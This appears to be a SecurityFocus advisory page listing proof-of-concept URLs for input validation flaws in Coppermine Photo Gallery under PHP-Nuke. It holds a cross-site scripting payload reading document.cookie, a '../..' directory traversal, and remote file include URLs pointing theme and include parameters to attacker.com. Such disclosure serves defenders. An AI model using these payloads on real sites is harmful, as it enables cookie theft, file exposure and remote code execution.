Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Coppermine Photo Gallery Multiple Input Validation Vulnerabilities

No exploits are required to leverage these issues. The following proof-of-concept exploits have been provided:

Cross-site scripting proof of concept:
http://www.example.com/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>

Arbitrary directory browsing:
http://www.example.com/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..

Remote file include:
http://www.example.com/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com
http://www.example.com/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com
http://www.example.com/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com
http://www.example.com/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com







 

Privacy Statement
Copyright 2009, SecurityFocus